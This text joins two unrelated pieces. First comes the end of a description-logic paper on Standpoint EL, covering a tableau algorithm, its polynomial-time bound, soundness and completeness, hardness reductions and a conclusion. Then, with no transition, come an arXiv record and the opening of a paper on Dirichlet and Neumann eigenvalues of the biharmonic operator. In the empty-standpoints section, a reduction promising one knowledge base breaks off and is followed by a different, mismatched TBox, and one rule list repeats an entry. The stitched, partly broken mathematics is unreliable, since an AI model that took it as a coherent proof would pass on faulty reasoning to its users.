Constraint systems or completion graphs not containing clashes are called clash-free.\(\diamondsuit\)_ **The Algorithm** To decide whether a given \(\mathbb{S}_{\mathcal{EL}}\) knowledge base \(\mathcal{K}\) in normal form is satisfiable, we form the initial completion graph \(\mathbf{CG}_{I}\) with \(\mathcal{R}\!=\!\emptyset\) and \(\Delta\) consisting of an element \(\varepsilon_{\top}\) with \(\mathcal{L}(\varepsilon_{\top})\!=\!\emptyset\) and \(\mathcal{S}(\varepsilon_{\top})\!=\!S_{0}^{\mathcal{K}}\), and for every \(a\!\in\!\mathsf{IN}_{\mathcal{K}}\) an element \(\varepsilon_{a}\) with \(\mathcal{L}(\varepsilon_{a})\!=\!\emptyset\) and \(\mathcal{S}(\varepsilon_{a})=S_{0}^{\mathcal{K}}\cup\{(x_{\mathsf{s}}\!:\!a)\mid(x_{\mathsf{s}}\!:\!\top)\in S_{0}^{\mathcal{K}}\}\). After that, we repeatedly apply the local and global completion rules from Figure 1, where LL rules have the highest priority, followed by LC, GN, and GG rules, in that order. After each rule application, we check if \(\mathbf{CG}\) contains a clash and terminate with answer "unsatisfiable" should this be the case. If we arrive at a clash-free \(\mathbf{CG}\) with no more rules applicable, the algorithm terminates and returns "satisfiable". **Quasi-Models and Quasi-Satisfiability** This section sketches how special structures, called (dual) quasi-models, can serve as proxies for proper \(\mathbb{S}_{\mathcal{EL}}\) models. **Global non-generating (GN) rules (excerpt from Figure 1):** \(\mathbf{R}_{\downarrow}\) If \((x\!:\!C)\in\mathcal{S}(\varepsilon)\), \(\langle\varepsilon^{\prime},x^{\prime},\varepsilon,x,R\rangle\in\mathcal{R}\), and \(\exists R.C\in\mathsf{C}_{\mathcal{K}}\), but \((x^{\prime}\!:\!\exists R.C)\notin\mathcal{S}(\varepsilon^{\prime})\), then set \(\mathcal{S}(\varepsilon^{\prime}):=\mathcal{S}(\varepsilon^{\prime})\cup\{x^{\prime}\!:\!\exists R.C\}\). \(\mathbf{R}_{r}\) If \(\{x\!:\!a,\ x\!:\!R(a,b)\}\subseteq\mathcal{S}(\varepsilon)\) and \((x^{\prime}\!:\!b)\in\mathcal{S}(\varepsilon^{\prime})\), but \(\langle\varepsilon,x,\varepsilon^{\prime},x^{\prime},R\rangle\notin\mathcal{R}\), then set \(\mathcal{R}:=\mathcal{R}\cup\{\langle\varepsilon,x,\varepsilon^{\prime},x^{\prime},R\rangle\}\). **Polytime Termination and Correctness** Next, we give an overview of our argument why our algorithm runs in polynomial time with respect to \(\left\lVert\mathcal{K}\right\rVert\), the size of its input \(\mathcal{K}\). We observe that the number \(\left\lvert\Delta\right\rvert\) of domain elements of any completion graph \(\mathbf{CG}\) constructed by our algorithm is bounded by \(3\left\lVert\mathcal{K}\right\rVert^{2}\) (\(\dagger\)). We also find that the number of variables used in any single \(\mathcal{S}(\varepsilon)\) is bounded by \(2\left\lVert\mathcal{K}\right\rVert^{2}\) and the number of constraints in \(\mathcal{S}(\varepsilon)\) by \(2\left\lVert\mathcal{K}\right\rVert^{3}\) (\(\ddagger\)). Now, the number of applications of \(\mathbf{R}_{\exists}\) is bounded by the number of elements in each completion graph, i.e. at most \(3\left\lVert\mathcal{K}\right\rVert^{2}\) in view of (\(\dagger\)). Since the rules \(\mathbf{R}_{\preceq}\), \(\mathbf{R}_{\sqcap}\), \(\mathbf{R}_{\sqsubseteq}\), \(\mathbf{R}_{\sqcap}\), \(\mathbf{R}_{\diamond}\), \(\mathbf{R}_{g}\), \(\mathbf{R}_{a}\), \(\mathbf{R}_{r}\), \(\mathbf{R}_{r^{\prime}}\) and \(\mathbf{R}_{\downarrow}\) produce one or more new constraints in an element, the number of applications of such rules per element is bounded by \(2\left\lVert\mathcal{K}\right\rVert^{3}\) due to (\(\ddagger\)).
\(\mathbf{R}_{\exists^{\prime}}\) can add, for each \(\varepsilon\) with \((C,s,x)\in\mathcal{L}(\varepsilon)\), at most one quasi-role from every variable in every element, thus we have at most \(6\left\lVert\mathcal{K}\right\rVert^{4}\) rule applications. The total number of rule applications is bounded by the rule applications per element multiplied by the bound on elements, together with the bound on \(\mathbf{R}_{\exists}\), which gives us \[(6\left\lVert\mathcal{K}\right\rVert^{4})(3\left\lVert\mathcal{K}\right\rVert^{2})+(2\left\lVert\mathcal{K}\right\rVert^{3})(3\left\lVert\mathcal{K}\right\rVert^{2})+3\left\lVert\mathcal{K}\right\rVert^{2}\leq 27\left\lVert\mathcal{K}\right\rVert^{6}.\] **Theorem 3**.: _The completion algorithm terminates after at most \(c\left\lVert\mathcal{K}\right\rVert^{6}\) steps, where \(c\) is a constant._ As every single rule application can be clearly executed in polynomial time with respect to \(\mathcal{K}\), we can conclude that our algorithm runs in polynomial time. We are now ready to establish correctness of our decision algorithm, by showing its soundness and completeness. For both directions, Theorem 2 will come in handy. As usual, the soundness part of our argument is the easier one. **Theorem 4** (Soundness).: _If there is a globally complete, coherent and clash-free completion graph \(\mathbf{CG}\) for a knowledge base \(\mathcal{K}\), then \(\mathcal{K}\) is satisfiable._ Proof.: _(sketch)_ Given \(\mathbf{CG}=\left\langle\Delta,\mathcal{S},\mathcal{L},\mathcal{R}\right\rangle\), let \(\Gamma\) consist of all runs on \(\mathbf{CG}\). Then we can show that \(\mathcal{Q}=\left\langle\Delta,\mathcal{S},\mathcal{L},\mathcal{R},\Gamma\right\rangle\) constitutes a quasi-model for \(\mathcal{K}\), so we can conclude by Theorem 2 that \(\mathcal{K}\) is satisfiable. Proving completeness requires significantly more work. We make use of a notion that, intuitively, formalizes the idea that a completion graph \(\mathbf{CG}\) under development is "in sync" with a quasi-model \(\mathcal{Q}\) of the same knowledge base, where \(\mathcal{Q}\) can be conceived as a model-theoretic "upper bound" of \(\mathbf{CG}\). **Definition 7** (\(\mathcal{Q}\)-compatibility).: _Let \(\mathcal{K}\) be a \(\mathbb{S}_{\mathcal{EL}}\) knowledge base and \(\mathcal{Q}=\left\langle\Delta^{q},\mathcal{S}^{q},\mathcal{L}^{q},\mathcal{R}^{q},\mathcal{I}^{q}\right\rangle\) be a quasi-model for \(\mathcal{K}\).
A completion graph \(\mathbf{CG}=\left\langle\Delta,\mathcal{S},\mathcal{L},\mathcal{R}\right\rangle\) for \(\mathcal{K}\) is called \(\mathcal{Q}\)-compatible iff there is a left-total relation \(\mu\subseteq\Delta\times\Delta^{q}\) such that \(\mathcal{L}(g)\subseteq\mathcal{L}^{q}(\varepsilon)\) for each \(\left\langle g,\varepsilon\right\rangle\in\mu\), and_ * _for each_ \((g,\varepsilon)\in\mu\) _there is a surjective function_ \(\mu_{g,\varepsilon}\) _from the variables in_ \(\mathcal{S}^{q}(\varepsilon)\) _to the variables in_ \(\mathcal{S}(g)\) _such that_ * \((\mu_{g,\varepsilon}(v)\,{:}\,\Theta)\in\mathcal{S}(g)\) _implies_ \((v\,{:}\,\Theta)\in\mathcal{S}^{q}(\varepsilon)\)_,_ * _if_ \(\left\langle g,x,g^{\prime},x^{\prime},R\right\rangle\in\mathcal{R}\) _then_ \(\left\langle\varepsilon,y,\varepsilon^{\prime},y^{\prime},R\right\rangle\in\mathcal{R}^{q}\) _for some_ \((g,\varepsilon),(g^{\prime},\varepsilon^{\prime})\in\mu\) _with_ \(\mu_{g,\varepsilon}(y)=x\) _and_ \(\mu_{g^{\prime},\varepsilon^{\prime}}(y^{\prime})=x^{\prime}\)_._ \(\Diamond\) With this definition, we can establish two important insights: * The tableau algorithm's initial completion graph \(\mathbf{CG}_{I}\) is \(\mathcal{Q}\)-compatible for any quasi-model \(\mathcal{Q}\) of \(\mathcal{K}\). * Applications of tableau rules preserve \(\mathcal{Q}\)-compatibility. This entails that the completion graph maintained in the algorithm will be \(\mathcal{Q}\)-compatible at all times, thus also upon termination. We exploit this insight to show completeness. **Theorem 5** (Completeness).: _If a \(\mathbb{S}_{\mathcal{EL}}\) knowledge base \(\mathcal{K}\) is satisfiable, the tableau algorithm will construct a globally complete, coherent, and clash-free completion graph for \(\mathcal{K}\)._ Proof.: If \(\mathcal{K}\) is satisfiable then by Theorem 2, there is a quasi-model \(\mathcal{Q}\) for \(\mathcal{K}\). According to Theorem 3, we can obtain a globally complete completion graph \(\mathbf{CG}\) after polynomially many applications of the tableau rules, which, as just discussed, is \(\mathcal{Q}\)-compatible. It must thus also be clash-free: otherwise there would be an element \(g\) and a variable \(x\) with \((x\,{:}\,\bot)\in\mathcal{S}(g)\); then there is \((g,\varepsilon)\in\mu\) and, by surjectivity of \(\mu_{g,\varepsilon}\), a variable \(v\) with \(\mu_{g,\varepsilon}(v)=x\), so that \((v\,{:}\,\bot)\in\mathcal{S}^{q}(\varepsilon)\), which is a contradiction because \(\mathcal{Q}\) is a quasi-model. It is not hard to show that \(\mathbf{CG}\) is also coherent, whence we can conclude that \(\mathbf{CG}\) is a globally complete, coherent, and clash-free completion graph for \(\mathcal{K}\). Together with the well-known PTime-hardness of the satisfiability problem in (standpoint-free) \(\mathcal{EL}\), we have therefore established PTime-completeness of \(\mathbb{S}_{\mathcal{EL}}\) and exhibited a worst-case optimal algorithm for it. ## 4 Intractable Extensions While the shown tractability of reasoning in \(\mathbb{S}_{\mathcal{EL}}\) is good news, one might ask if one could include more modelling features or relax certain side conditions and still preserve tractability. This section shows that tractability can be easily lost (at least under standard complexity-theoretic assumptions).
**Empty standpoints** While it may make sense on a philosophical level, one might wonder whether the constraint that \(\sigma(\mathsf{s})\) needs to be nonempty for every \(\mathsf{s}\in\mathsf{ST}_{\mathcal{K}}\) has an impact on tractability. In fact, dropping this constraint, obtaining a logic \(\mathbb{S}_{\mathcal{EL}}^{\emptyset}\) with the same syntax but modified semantics, would increase expressivity (standpoint non-emptiness could still be enforced in \(\mathbb{S}_{\mathcal{EL}}^{\emptyset}\) by asserting \(\top\sqsubseteq\Diamond_{\mathsf{s}}\top\) for every \(\mathsf{s}\in\mathsf{ST}_{\mathcal{K}}\)). However, satisfiability in \(\mathbb{S}_{\mathcal{EL}}^{\emptyset}\) turns out to be NP-hard, even when disallowing usage of concept and role names entirely. The key insight that both \(\Diamond_{\mathsf{s}}\top\) and its negation \(\Box_{\mathsf{s}}\bot\) can be expressed as \(\mathbb{S}_{\mathcal{EL}}^{\emptyset}\) concepts gives rise to the following reduction from 3SAT: Assume an instance \(\phi=\bigvee\mathbf{C}_{1}\,\wedge\,\ldots\,\wedge\bigvee\mathbf{C}_{n}\) of 3SAT containing \(n\) clauses (i.e., disjunctions of literals) \(\bigvee\mathbf{C}_{j}\) over the propositional variables \(P=\{p_{1},\ldots,p_{k}\}\). We note that \(\phi\) is equivalent to \((\bigwedge\overline{\mathbf{C}}_{1}\to\mathbf{false})\wedge\ldots\wedge(\bigwedge\overline{\mathbf{C}}_{n}\to\mathbf{false})\), where \(\overline{\mathbf{C}}_{j}\) is obtained from \(\mathbf{C}_{j}\) by replacing every literal by its negated version. Let now \(\{\mathsf{s}_{1},\ldots,\mathsf{s}_{k}\}\) be a set of standpoint names and, for any literal \(\ell\) over \(P\), define \[L_{\ell}=\begin{cases}\Diamond_{\mathsf{s}_{i}}\top&\text{ if }\ell=p_{i},\\ \Box_{\mathsf{s}_{i}}\bot&\text{ if }\ell=\neg p_{i}.\end{cases}\] Then, \(\phi\) is satisfiable iff the following \(\mathbb{S}_{\mathcal{EL}}^{\emptyset}\) knowledge base is satisfiable:
Then \(\phi\) is satisfiable iff the following \(\mathbb{S}_{\mathcal{EL}}\) TBox is unsatisfiable (with all axioms instantiated for \(1\leq i\leq k\)): \[\begin{array}{l}\top\sqsubseteq\exists T.L_{0}\hskip 14.226378ptL_{k} \sqsubseteq\lozenge_{*}S\\ L_{i-1}\sqsubseteq\exists R.\square_{*}(L_{i}\sqcap T_{p_{i}})\hskip 14.226378pt \exists\dot{R}.(T_{p_{i}}\sqcap S)\sqsubseteq(T_{p_{i}}\sqcap S)\\ L_{i-1}\sqsubseteq\exists\dot{R}.\square_{*}(L_{i}\sqcap T_{\neg p_{i}})\hskip 14.226378pt \exists\dot{R}.(T_{\neg p_{i}}\sqcap S)\sqsubseteq(T_{\neg p_{i}}\sqcap S)\\ T_{\ell}\sqsubseteq T_{\mathbb{C}_{j}}\hskip 14.226378pt\text{for all }\ell\in \mathbb{C}_{j}\hskip 14.226378ptT_{\mathbb{C}_{1}}\sqcap\ldots\sqcap T_{\mathbb{C}_{n}} \sqsubseteq\bot\end{array}\] **Nominal Concepts** Nominal concepts are a modelling feature widely used in ontology languages. For an individual \(o\), the nominal concept \(\{o\}\) refers to the singleton set \(\{o^{\mathcal{I}}\}\). Let \(\mathcal{ELO}\) denote \(\mathcal{EL}\) extended by nominal concepts. Several formalisms subsuming \(\mathcal{ELO}\), including OWL 2 EL, are known to allow for tractable reasoning [1, 2]. However, in the presence of standpoints, nominals prove to be detrimental for the reasoning complexity: satisfiability of \(\mathbb{S}_{\mathcal{ELO}}\) TBoxes using just one nominal concept \(\{o\}\) turns out to be ExpTime-hard and thus definitely harder than for \(\mathbb{S}_{\mathcal{EL}}\). This can be shown by a PTime reduction of satisfiability for Horn-\(\mathcal{ALC}\) TBoxes (which is known to be ExpTime-complete [13]) to satisfiability of \(\mathbb{S}_{\mathcal{ELO}}\) TBoxes with just one standpoint (the global one) and one nominal concept \(\{o\}\). To this end, recall that any Horn-\(\mathcal{ALC}\) TBox can be normalised in PTime to consist of only axioms of the following shapes: \[A\sqsubseteq B\hskip 14.226378ptA\sqcap B\sqsubseteq C\hskip 14.226378pt\exists R.A\sqsubseteq B\hskip 14.226378ptA\sqsubseteq\exists R.B\hskip 14.226378ptA \sqsubseteq\forall R.B\] where \(A\) and \(B\) can be concept names, \(\top\), or \(\bot\). From a normalised Horn-\(\mathcal{ALC}\) TBox \(\mathcal{T}\), we obtain the target \(\mathbb{S}_{\mathcal{ELO}}\) TBox \(\mathcal{T}^{\prime}\) by (i) declaring every original concept name as rigid via the axiom \(A\sqsubseteq\square_{*}A\) as well as (ii) replacing every axiom of the shape \(A\sqsubseteq\exists R.B\) by the axiom \[A\sqsubseteq\lozenge_{*}((\exists\mathit{Src.}\{o\})\sqcap(\exists R.(B\sqcap \exists\mathit{Tgt.}\{o\})))\] (introducing two fresh role names \(\mathit{Src}\) and \(\mathit{Tgt}\)), and replacing every axiom of the shape \(A\sqsubseteq\forall r.B\) by the two axioms \[A\sqcap\exists R.\top\sqsubseteq(\exists\mathit{Src.}(\{o\}\sqcap\ddot{B})) \hskip 14.226378pt\text{and}\hskip 14.226378pt\exists\mathit{Tgt.}\ddot{B} \sqsubseteq B,\] introducing a copy \(\ddot{A}\) for every original concept name \(A\). With this polytime translation, satisfiability of the Horn-\(\mathcal{ALC}\) TBox \(\mathcal{T}\) and the \(\mathbb{S}_{\mathcal{ELO}}\) TBox \(\mathcal{T}^{\prime}\) coincide. ## 5 Conclusion and Future Work In this paper we introduced Standpoint \(\mathcal{EL}\), a new, lightweight member of the emerging family of standpoint logics. We described the new modelling and reasoning capabilities it brings to large-scale ontology management and established a PTime (and thus worst-case optimal) tableau-based decision procedure for standard reasoning tasks. 
We also demonstrated that certain extensions of \(\mathbb{S}_{\mathcal{EL}}\), which would be desirable from a expressivity point of view, inevitably come with a loss of tractability (sometimes under the assumption \(\mathrm{P}\neq\mathrm{NP}\)). Yet several modelling features can be accommodated into \(\mathbb{S}_{\mathcal{EL}}\) without endangering tractability. For instance, from a usability perspective, it would seem very advantageous if not just single axioms, but whole axiom sets (up to whole knowledge bases) could be preceded by standpoint modalities. By definition, an axiom of the type \(\square_{*}\mathcal{K}\) can be equivalently rewritten into the axiom set \(\{\square_{*}\phi\mid\phi\in\mathcal{K}\}\). While something alike is not immediately possible for axioms of the type \(\lozenge_{*}\mathcal{K}\), our normalization rule for diamond-preceded axioms can be lifted and thus \(\lozenge_{*}\mathcal{K}\) can be rewritten to \(\square_{*}\mathcal{K}\) (and further to \(\{\square_{*}\varphi\mid\phi\in\mathcal{K}\}\)) upon introducing a fresh standpoint name \(\mathsf{s}^{\prime}\) and asserting \(\mathsf{s}^{\prime}\preceq\mathsf{s}\). Thus standpoint-modality-annotated knowledge bases come essentially for free in \(\mathbb{S}_{\mathcal{EL}}\). In fact, we already made use of this modelling feature in Axiom 9 and Axiom 10 of our initial example. Moreover, we are confident that, as opposed to nominal concepts, other modelling features of OWL 2 EL can be added to \(\mathbb{S}_{\mathcal{EL}}\) without harming tractability. These include complex role inclusions (also called role-chain axioms) such as \(\mathsf{FindingSite}\circ\mathsf{Partof}\sqsubseteq\mathsf{FindingSite}\), and the self-concept as in ApoptoticCell \(\sqsubseteq\exists\mathtt{Destroys.Self}\). It also seems plausible that the sharpening statements can be extended to incorporate intersection and disjointness of standpoints. Beyond exploring the tractability boundaries, next endeavours include to investigate feasible strategies for developing a \(\mathbb{S}_{\mathcal{EL}}\) reasoner. Options include * to implement our tableau algorithm from scratch or by modifying existing open-source tableaux systems, * to design a deduction calculus over normalised axioms that can be translated into a datalog program, akin to the approach of Krotzsch [10], then utilizing a state-of-the-art datalog engine like VLog [10], or * to find a reduction to reasoning in standpoint-free (PTime extensions of) \(\mathcal{EL}\) that is supported by existing reasons (such as ELK [13] or Snorocket [13]). With one or several reasoners in place, appropriate experiments will be designed and conducted to assess practical feasibility and scalability. Beyond the \(\mathcal{EL}\) family, further popular and computationally lightweight formalisms exist, such as the tractable profiles OWL 2 RL and OWL 2 QL [13]. It would be interesting to investigate options to extend these by standpoint reasoning without sacrificing tractability. More generally, we intend to research the effect of adding standpoints to KR languages - light- or heavyweight - in terms of computational properties and expressivity as well as avenues for implementing efficient reasoners for them.
2305.18075
Improved inequalities between Dirichlet and Neumann eigenvalues of the biharmonic operator
We prove that the $(k+d)$-th Neumann eigenvalue of the biharmonic operator on a bounded connected $d$-dimensional $(d\ge2)$ Lipschitz domain is not larger than its $k$-th Dirichlet eigenvalue for all $k\in\mathbb{N}$. For a special class of domains with symmetries we obtain a stronger inequality. Namely, for this class of domains, we prove that the $(k+d+1)$-th Neumann eigenvalue of the biharmonic operator does not exceed its $k$-th Dirichlet eigenvalue for all $k\in\mathbb{N}$. In particular, in two dimensions, this special class consists of domains having an axis of symmetry.
Vladimir Lotoreichik
2023-05-29T13:21:22Z
http://arxiv.org/abs/2305.18075v1
# Improved inequalities between Dirichlet and Neumann eigenvalues of the biharmonic operator ###### Abstract. We prove that the \((k+d)\)-th Neumann eigenvalue of the biharmonic operator on a bounded connected \(d\)-dimensional (\(d\geq 2\)) Lipschitz domain is not larger than its \(k\)-th Dirichlet eigenvalue for all \(k\in\mathbb{N}\). For a special class of domains with symmetries we obtain a stronger inequality. Namely, for this class of domains, we prove that the \((k+d+1)\)-th Neumann eigenvalue of the biharmonic operator does not exceed its \(k\)-th Dirichlet eigenvalue for all \(k\in\mathbb{N}\). In particular, in two dimensions, this special class consists of domains having an axis of symmetry. ## 1. Introduction Eigenvalue inequalities for differential operators is a classical topic in spectral theory. The aim of the present paper is to obtain inequalities between Dirichlet and Neumann eigenvalues of the biharmonic operator on a bounded domain in the spirit of the eigenvalue inequality proved by Friedlander [11], which states that the \((k+1)\)-th Neumann eigenvalue of the Laplacian does not exceed its \(k\)-th Dirichlet eigenvalue. Recently, Provenzano [11] obtained among other results an inequality of this type for the biharmonic operator and conjectured its improved variant. Our analysis is largely inspired by this conjecture. We obtain an eigenvalue inequality for the biharmonic operator, which significantly improves the inequality in [11] in the space dimension \(d\geq 3\), but it still remains weaker than the conjectured inequality. Moreover, for a class of domains with symmetries we managed to prove the eigenvalue inequality for the biharmonic operator conjectured in [11]. The spectral analysis of the biharmonic operator was initially motivated by applications in classical mechanics in the study of vibration of plates [10]. It is now an independent mathematical area with many challenging open problems. Let us now introduce the biharmonic operators with Dirichlet and Neumann boundary conditions on a bounded domain. Let \(\Omega\subset\mathbb{R}^{d}\), \(d\geq 2\), be a bounded connected Lipschitz domain. As usual, we denote by \(H^{2}(\Omega)\) the \(L^{2}\)-based second-order Sobolev space on \(\Omega\) and by \(H^{2}_{0}(\Omega)\) the closure of \(C^{\infty}_{0}(\Omega)\) in \(H^{2}(\Omega)\). The non-negative, densely defined quadratic forms \[\mathfrak{h}_{\mathrm{D}}[u] :=\sum_{i,j=1}^{d}\|\partial_{ij}u\|_{L^{2}(\Omega)}^{2},\qquad \operatorname{dom}\mathfrak{h}_{\mathrm{D}}:=H^{2}_{0}(\Omega),\] \[\mathfrak{h}_{\mathrm{N}}[u] :=\sum_{i,j=1}^{d}\|\partial_{ij}u\|_{L^{2}(\Omega)}^{2},\qquad \operatorname{dom}\mathfrak{h}_{\mathrm{N}}:=H^{2}(\Omega), \tag{1.1}\] are closed in the Hilbert space \(L^{2}(\Omega)\) (see _e.g._[1, Theorem 2.1]); here we use the abbreviation \(\partial_{ij}u:=\frac{\partial^{2}u}{\partial x_{i}\partial x_{j}}\) for \(i,j\in\{1,2,\dots,d\}\). The self-adjoint Dirichlet and Neumann biharmonic operators \(\mathsf{H}_{\mathrm{D}}\) and \(\mathsf{H}_{\mathrm{N}}\) on \(\Omega\) are associated with the quadratic forms \(\mathfrak{h}_{\mathrm{D}}\) and \(\mathfrak{h}_{\mathrm{N}}\), respectively, via the first representation theorem [10, Theorem VI 2.1]. It is not hard to check via integration by parts that both operators act as the biharmonic operator \(\Delta^{2}\) on functions satisfying appropriate boundary conditions, which are specified in Remark 2.1 below. The spectra of these operators are purely discrete. 
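It is perhaps worth recalling a classical identity at this point (it is not used below, but it explains why \(\mathfrak{h}_{\mathrm{D}}\) is often written via the Laplacian): for real-valued \(u\in C_{0}^{\infty}(\Omega)\), and hence by density for all \(u\in H^{2}_{0}(\Omega)\), two integrations by parts give
\[\sum_{i,j=1}^{d}\|\partial_{ij}u\|_{L^{2}(\Omega)}^{2}=\sum_{i,j=1}^{d}\int_{\Omega}\partial_{ii}u\,\partial_{jj}u\,\mathrm{d}x=\|\Delta u\|_{L^{2}(\Omega)}^{2},\]
so that on \(H^{2}_{0}(\Omega)\) the form \(\mathfrak{h}_{\mathrm{D}}\) coincides with \(u\mapsto\|\Delta u\|_{L^{2}(\Omega)}^{2}\). On \(H^{2}(\Omega)\) the boundary terms do not vanish and the two quantities differ in general; for instance, \(u(x)=x_{1}x_{2}\) satisfies \(\Delta u=0\) but has a non-trivial Hessian.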
In the two-dimensional setting (\(d=2\)), the Dirichlet biharmonic operator describes the vibrations of a clamped plate, while its Neumann counterpart describes the free plate. The literature on the biharmonic operators is quite extensive and it is not possible to make a complete overview. Many contributions are devoted to spectral isoperimetric inequalities [1, 1, 2, 10, 11, 12]. Asymptotic expansions of the eigenvalues of the biharmonic operator are considered in [13, 14, 15]. Bounds on the eigenvalues of the biharmonic operator are obtained in [16, 17, 18]. Let us now discuss in detail the results obtained in [14] by Provenzano. We denote by \(\{\lambda_{k}\}_{k\geq 1}\) and \(\{\mu_{k}\}_{k\geq 1}\) the eigenvalues of \(\mathsf{H}_{\mathrm{D}}\) and \(\mathsf{H}_{\mathrm{N}}\), respectively, enumerated in the non-decreasing order and repeated with multiplicities taken into account. The following inequality is proved in [14, Theorem 1.1] \[\mu_{k+2}<\lambda_{k},\qquad\text{for all }k\in\mathbb{N}. \tag{1.2}\] In [14], a more general inequality for the polyharmonic operators on \(\Omega\) is actually proved, which reduces to (1.2) in the case of the biharmonic operator. In the same paper it was conjectured that the inequality (1.2) can be strengthened as \[\mu_{k+d+1}\leq\lambda_{k},\qquad\text{for all }k\in\mathbb{N}\qquad\text{( conjecture)}, \tag{1.3}\] and that the inequality in (1.3) might even be always strict. In the present paper we improve the inequality (1.2) in the space dimension \(d\geq 3\) in the general setting and prove the conjectured inequality (1.3) for a class of domains having additional symmetries. Our first result concerns the general case for higher space dimensions. **Theorem 1.1**.: _For the space dimension \(d\geq 3\), the following inequality holds_ \[\mu_{k+d}\leq\lambda_{k},\qquad\text{for all }k\in\mathbb{N}.\] The proof of the above theorem still works in two dimensions and gives \(\mu_{k+2}\leq\lambda_{k}\) for all \(k\in\mathbb{N}\), which is slightly weaker than the inequality (1.2). For this reason we have excluded the case \(d=2\) from the formulation. In order to formulate the second result we introduce for \(l\in\{2,\dots,d\}\) the mapping \[\mathsf{J}_{l}\colon\mathbb{R}^{d}\to\mathbb{R}^{d},\qquad\mathsf{J}_{l}x:=(x _{1},x_{2},\dots,-x_{l},\dots,x_{d})^{\top}, \tag{1.4}\] where \(x=(x_{1},x_{2},\dots,x_{d})^{\top}\). The domain \(\Omega\) is symmetric with respect to the hyperplane \(\{x\in\mathbb{R}^{d}\colon x_{l}=0\}\) with \(l\in\{2,\dots,d\}\) in the case that \(\mathsf{J}_{l}(\Omega)=\Omega\). **Theorem 1.2**.: _Let \(d\geq 2\) and assume that the bounded connected Lipschitz domain \(\Omega\) is such that \(\mathsf{J}_{l}(\Omega)=\Omega\) for all \(l\in\{2,\dots,d\}\). Then the following inequality holds_ \[\mu_{k+d+1}\leq\lambda_{k},\qquad\text{for all }k\in\mathbb{N}.\] The special role of the \(x_{1}\)-axis in the formulation of Theorem 1.2 is not restrictive. Since we are allowed to translate and rotate the domain \(\Omega\), we only require that \(\Omega\) is symmetric with respect to \(d-1\) mutually orthogonal hyperplanes. In two dimensions, the condition in Theorem 1.2 is equivalent to the fact that \(\Omega\) has an axis of symmetry. Theorem 1.2 applies, in particular, to ellipses, rectangles, isosceles triangles, and annuli. 
In three dimensions, Theorem 1.2 can be applied, for example, to the cylindrical domain \(\Omega=(0,h)\times\omega\subset\mathbb{R}^{3}\) of some positive height \(h>0\) and with the cross-section \(\omega\subset\mathbb{R}^{2}\) being a bounded connected Lipschitz domain with an axis of symmetry. The proofs of Theorems 1.1 and 1.2 rely on the min-max principle, for which we construct a subspace of trial functions using a modification of the approach suggested by Filonov in [15] for the proof of a similar inequality between Dirichlet and Neumann eigenvalues of the Laplacian. The key idea is to construct a trial subspace for \(\mathsf{H}_{\mathrm{N}}\) as a span of \(k\) orthonormal eigenfunctions of \(\mathsf{H}_{\mathrm{D}}\) corresponding to its first \(k\) eigenvalues and of \(d\) additional functions for the proof of Theorem 1.1 and, respectively, \(d+1\) additional functions for the proof of Theorem 1.2. These additional functions are constructed in a different way than in the paper [14]. Our construction better reflects the properties of the biharmonic operator. Any non-trivial function \(u\) from the span of the additional functions belongs to \(H^{2}(\Omega)\), is linearly independent from the span of \(k\) orthonormal eigenfunctions of \(\mathsf{H}_{\mathrm{D}}\) corresponding to its first \(k\) eigenvalues, and satisfies the identities \[\Delta^{2}u=\lambda_{k}u\qquad\text{and}\qquad\sum_{i,j=1}^{d}\|\partial_{ij}u\| _{L^{2}(\Omega)}^{2}=\lambda_{k}\|u\|_{L^{2}(\Omega)}^{2}. \tag{1.5}\] The second property in (1.5) is achieved by the construction of the additional functions satisfying a number of orthogonality relations. In the proof of Theorem 1.1 we make use of the Borsuk-Ulam theorem to achieve the required orthogonality. In the proof of Theorem 1.2 these relations are satisfied thanks to the rich symmetry properties of the domain. In order to position our work in the existing literature we review known results on inequalities between Dirichlet and Neumann eigenvalues. Such inequalities is a classical topic for the Laplace operator. We will denote by \(\{\widehat{\lambda}_{k}\}_{k\geq 1}\) and \(\{\widehat{\mu}_{k}\}_{k\geq 1}\) the eigenvalues of the Laplace operator on a bounded domain with, respectively, Dirichlet and Neumann boundary conditions, enumerated in the non-decreasing order and repeated with multiplicities taken into account. Polya proved in [10] that \(\widehat{\mu}_{2}<\widehat{\lambda}_{1}\) in two dimensions for smooth domains. For convex, two-dimensional domains with \(C^{2}\)-boundary Payne proved in [10] that \(\widehat{\mu}_{k+2}<\widehat{\lambda}_{k}\) for all \(k\in\mathbb{N}\). The result of Payne was generalized by Levine and Weinberger [11], who proved the inequality \(\widehat{\mu}_{k+d}\leq\widehat{\lambda}_{k}\) for all \(k\in\mathbb{N}\), for any convex domain. For general (not necessarily convex) bounded \(C^{1}\)-smooth domains in any space dimension the inequality \(\widehat{\mu}_{k+1}\leq\widehat{\lambda}_{k}\) for all \(k\in\mathbb{N}\) was obtained by Friedlander in [12]. Filonov [10] simplified the argument by Friedlander and showed that the strict inequality \(\widehat{\mu}_{k+1}<\widehat{\lambda}_{k}\) holds for all \(k\in\mathbb{N}\), for a class of domains even less regular than Lipschitz. 
Similar type inequalities are also later obtained for other types of differential operators: see [13] for the sub-Laplacian on the Heisenberg group and the magnetic Laplacian, [14] for the Laplacian with mixed boundary conditions, and [15] for the Stokes operator. The present paper belongs to the same line of research. It remains to outline the structure of the paper. In Section 2 we collect preliminary facts and auxiliary lemmas, which will later be used in the proofs of the main results. In the same preliminary section, we also provide more details on the Dirichlet and Neumann spectral problems for the biharmonic operator. In Section 3 we prove Theorem 1.1 and, finally, in Section 4 we prove Theorem 1.2. The proofs of these two theorems share common ideas, but we prefer to provide both arguments in full detail for the convenience of the reader. ## 2. **Preliminaries** In this preliminary section we collect a number of tools used in the proofs of the main results. First, in Subsection 2.1 we recall known properties of the biharmonic operators with Dirichlet and Neumann boundary conditions. Next, in Subsection 2.2 we state a lemma based on the unique continuation principle for the Laplace operator. Finally, in Subsection 2.3 we present an auxiliary construction based on the Borsuk-Ulam theorem of a special family of orthogonal functions. This family will be used in the proof of Theorem 1.1. ### Dirichlet and Neumann biharmonic operators Recall that \(\Omega\subset\mathbb{R}^{d}\), \(d\geq 2\), is a bounded connected Lipschitz domain and that the biharmonic operators \(\mathsf{H}_{\mathrm{D}}\) and \(\mathsf{H}_{\mathrm{N}}\) with Dirichlet and Neumann boundary conditions are associated with the quadratic forms \(\mathfrak{h}_{\mathrm{D}}\) and \(\mathfrak{h}_{\mathrm{N}}\), respectively, defined in (1.1). _Remark 2.1_.: In this remark we will provide strong formulations of the spectral problems for \(\mathsf{H}_{\mathrm{D}}\) and \(\mathsf{H}_{\mathrm{N}}\). It is not difficult to verify via integration by parts that the spectral problem for the Dirichlet 